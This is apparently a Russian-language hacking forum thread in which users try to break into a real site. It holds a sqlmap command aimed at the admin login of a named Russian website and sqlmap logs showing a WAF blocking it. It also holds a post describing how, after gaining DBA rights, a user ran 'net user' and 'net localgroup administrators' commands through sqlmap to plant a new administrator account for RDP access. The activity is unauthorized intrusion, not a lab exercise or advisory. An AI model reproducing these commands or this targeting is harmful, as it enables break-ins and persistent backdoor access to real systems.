↑
Не хорошо по ру работать
sqlmap --random-agent -u ' http://dsm-print.ru/admin/admin.php
' --data='enter_admin=&admin_name=*&admin_password=' --dbs --is-dba
__________________________________________________ ____________________
На счёт мод сека, тут надо уже ручками крутить ))
По RU -да не вреда ради - просто очень инфа нужна - тото я гляжу сдесь половина ветки RU скулями забита....
[04:59:22] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests
[04:59:22] [WARNING] HTTP error codes detected during run:
400 (Bad Request) - 430 times, 414 (Request-URI Too Long) - 639 times
[04:59:22] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
↑
Не как не могу раскрутить и за этого убогого WAF
Код:
[04:59:22] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests
[04:59:22] [WARNING] HTTP error codes detected during run:
400 (Bad Request) - 430 times, 414 (Request-URI Too Long) - 639 times
[04:59:22] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
Помогите
Тебе лучше в тему Ваши вопросы по уязвимостям обратиться с этим вопросом, информации которую ты предоставил мало, она не чем не поможет в решении проблемы.
↑
Тебе лучше в тему Ваши вопросы по уязвимостям
обратиться с этим вопросом, информации которую ты предоставил мало, она не чем не поможет в решении проблемы.
↑
Все оказалась проще некуда, если у тебя права True
Через sqlmap прописал нового пользователя RDP командами
net user Admin Pass /add
net localgroup administrators Admin /add
хммм... очень интересно а как это заюзать? (если можно . то скрином покажите пожалуйста).